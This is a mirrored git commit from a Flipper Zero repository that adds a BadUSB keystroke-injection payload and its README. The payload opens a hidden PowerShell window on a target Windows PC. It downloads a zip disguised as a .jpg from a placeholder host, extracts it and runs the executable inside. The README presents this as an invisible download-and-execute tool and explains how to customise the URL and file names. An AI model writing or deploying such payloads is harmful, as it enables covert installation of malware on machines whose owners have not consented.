mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 16:51:29 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+17
@@ -0,0 +1,17 @@
|
||||
REM Author: hell0
|
||||
REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc.
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
REM Target: All Windows
|
||||
DELAY 500
|
||||
GUI d
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell.exe
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
GUI d
|
||||
+47
@@ -0,0 +1,47 @@
|
||||
|
||||
# Invisible_DownExec_Zip_Extract
|
||||
|
||||
This script invisibly downloads an .zip file from the URL, extracts and runs it on the target pc.
|
||||
|
||||
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is not plug and play. You will have to do the following changes:
|
||||
|
||||
- change url for the .zip file "-Uri 'https://yoursite.com/zipfile.jpg'"
|
||||
- change name of the .zip file "-OutFile 'zipfile.zip'"
|
||||
- change path of the .exe in the extracted folder "-FilePath '.\zipfile\your_executable.exe'"
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell invisble
|
||||
- download .zip from url
|
||||
- extract .zip file
|
||||
- run exe from .zip file
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user